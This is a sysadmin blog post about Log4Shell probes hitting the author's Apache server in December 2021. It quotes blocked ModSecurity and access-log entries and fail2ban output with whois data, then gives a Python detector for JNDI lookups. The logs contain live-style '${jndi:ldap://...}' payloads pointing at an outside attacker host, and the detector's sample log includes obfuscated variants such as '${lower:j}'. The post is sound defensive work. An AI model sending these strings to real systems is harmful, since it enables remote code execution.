2021. 12. 16. 17:38 WorkHolic
Log4shell 첫 발생 외
First log4shell attack confirmed on a server I manage
[11/Dec/2021:07:14:50 +0900] [xxx.xxx.xxx.189/sid#a353cf0][rid#b571a40][/${jndi:ldaps://41e1e3ec.probe001.log4j.leakix.net:8443/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:34 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b3a2cd0][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:35 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b18e3d8][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
Detection after setting up fail2ban to block Log4Shell
The IP 121.4.56.143 has just been banned by Fail2Ban after
1 attempts against apache-log4j.
Here is more information about 121.4.56.143:
[Querying whois.apnic.net]
[whois.apnic.net]
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to '121.4.0.0 - 121.5.255.255'
% Abuse contact for '121.4.0.0 - 121.5.255.255' is 'ipas@cnnic.cn'
inetnum: 121.4.0.0 - 121.5.255.255
netname: TencentCloud
descr: Tencent cloud computing (Beijing) Co., Ltd.
descr: Floor 6, Yinke Building,38 Haidian St,
descr: Haidian District Beijing
country: CN
admin-c: JT1125-AP
tech-c: JX1747-AP
abuse-c: AC1601-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
last-modified: 2021-06-16T01:32:05Z
source: APNIC
irt: IRT-CNNIC-CN
address: Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox: ipas@cnnic.cn
admin-c: IP50-AP
tech-c: IP50-AP
auth: # Filtered
remarks: Please note that CNNIC is not an ISP and is not
remarks: empowered to investigate complaints of network abuse.
remarks: Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
last-modified: 2021-06-16T01:39:57Z
source: APNIC
role: ABUSE CNNICCN
address: Beijing, China
country: ZZ
phone: +000000000
e-mail: ipas@cnnic.cn
admin-c: IP50-AP
tech-c: IP50-AP
nic-hdl: AC1601-AP
remarks: Generated from irt object IRT-CNNIC-CN
abuse-mailbox: ipas@cnnic.cn
mnt-by: APNIC-ABUSE
last-modified: 2020-05-14T11:19:01Z
source: APNIC
person: James Tian
address: 9F, FIYTA Building, Gaoxinnanyi Road,Southern
address: District of Hi-tech Park, Shenzhen
country: CN
phone: +86-755-86013388-84952
e-mail: clarkcheng@tencent.com
nic-hdl: JT1125-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2021-09-17T00:37:15Z
source: APNIC
person: Jimmy Xiao
address: 9F, FIYTA Building, Gaoxinnanyi Road,Southern
address: District of Hi-tech Park, Shenzhen
country: CN
phone: +86-755-86013388-80224
e-mail: klayliang@tencent.com
nic-hdl: JX1747-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2021-09-17T00:38:09Z
source: APNIC
% Information related to '121.4.0.0/15AS45090'
route: 121.4.0.0/15
origin: AS45090
descr: China Internet Network Information Center
Floor1, Building No.1 C/-Chinese Academy of Sciences
4, South 4th Street
Haidian District,
mnt-by: MAINT-CNNIC-AP
last-modified: 2020-02-25T01:14:09Z
source: APNIC
% This query was served by the APNIC Whois Service version 1.88.15-SNAPSHOT (WHOIS-JP1)
Lines containing IP:121.4.56.143 in /var/log/httpd/*access_log
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:51 +0900] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "POST /login HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226
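The access-log lines above are what a fail2ban filter for an `apache-log4j` jail has to match. The post does not show the filter's regex, so the following is an added example written for this page, not the jail's own filter and not the author's configuration: it parses Apache common-log lines, decodes percent-encoding, collapses single-character lookups such as `${lower:j}` that are commonly used to split the word `jndi`, flags any request that still contains a `${jndi:` lookup, and lists the source addresses that reach a fail2ban-style `maxretry` threshold (the post's ban fired after 1 attempt). The sample log is constructed for the example using RFC 5737 documentation addresses, modelled on the excerpt in the post.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access log (not the post's data); RFC 5737 addresses
SAMPLE_LOG = """\
192.0.2.10 - - [16/Dec/2021:17:08:51 +0900] "GET /${jndi:ldap://198.51.100.7:1389/Exploit} HTTP/1.1" 400 226
192.0.2.10 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226
192.0.2.10 - - [16/Dec/2021:17:08:52 +0900] "POST /login HTTP/1.1" 400 226
192.0.2.11 - - [16/Dec/2021:17:09:03 +0900] "GET /?x=%24%7Bjndi%3Aldaps%3A%2F%2Fexample.test%2Fa%7D HTTP/1.1" 200 512
192.0.2.12 - - [16/Dec/2021:17:09:10 +0900] "GET /${${lower:j}ndi:rmi://example.test/a} HTTP/1.1" 404 196
192.0.2.13 - - [16/Dec/2021:17:09:15 +0900] "GET /index.html HTTP/1.1" 200 1024
"""

# Apache common log format: client ident user [timestamp] "request" status size
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The lookup itself, e.g. ${jndi:ldap://...}, matched case-insensitively
JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)

# A one-character lookup such as ${lower:j}, ${upper:N} or ${::-j},
# reduced to the character it yields so that "j" + "ndi" becomes "jndi"
CHAR_LOOKUP = re.compile(r'\$\{[^{}]*?:-?([^{}])\}')


def normalize(value):
    """Return the successive normalization stages of a request string.

    Every stage is kept (raw, decoded, collapsed) so that a payload which
    only matches before or after a transformation is still detected.
    """
    stages = [value]
    decoded = value
    for _ in range(3):                      # peel up to three layers of %-encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
        stages.append(decoded)
    collapsed = decoded
    for _ in range(10):                     # collapse nested one-char lookups
        nxt = CHAR_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if nxt == collapsed:
            break
        collapsed = nxt
    stages.append(collapsed)
    return stages


def is_jndi_probe(request):
    """True if the request line carries a JNDI lookup in any normalization stage."""
    return any(JNDI_LOOKUP.search(stage) for stage in normalize(request))


def scan_log(text, maxretry=1):
    """Count JNDI probes per client IP; return (counts, ips at/over maxretry)."""
    hits = Counter()
    for line in text.splitlines():
        m = ACCESS_LINE.match(line)
        if not m:
            continue                        # skip lines that are not access-log entries
        if is_jndi_probe(m.group('request')):
            hits[m.group('ip')] += 1
    banned = sorted(ip for ip, n in hits.items() if n >= maxretry)
    return dict(hits), banned


if __name__ == '__main__':
    counts, to_ban = scan_log(SAMPLE_LOG, maxretry=1)
    for ip, n in sorted(counts.items()):
        print(f'{ip}: {n} JNDI probe(s)')
    print('would ban:', ', '.join(to_ban))
```

Two things worth noting when reading the post's own logs against this. The ModSecurity blocks at the top were raised by CRS rule 960017 (a numeric IP in the Host header), not by a Log4Shell-specific rule, so they record the probes only because the scanner happened to send a bare-IP Host header. Likewise the 400 responses in the access log mean Apache rejected the request, which says nothing about whether a Java application behind it would have evaluated the lookup; a detector such as this one should run over the raw request data, not only over blocked requests.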
#log4shell #log4j #fail2ban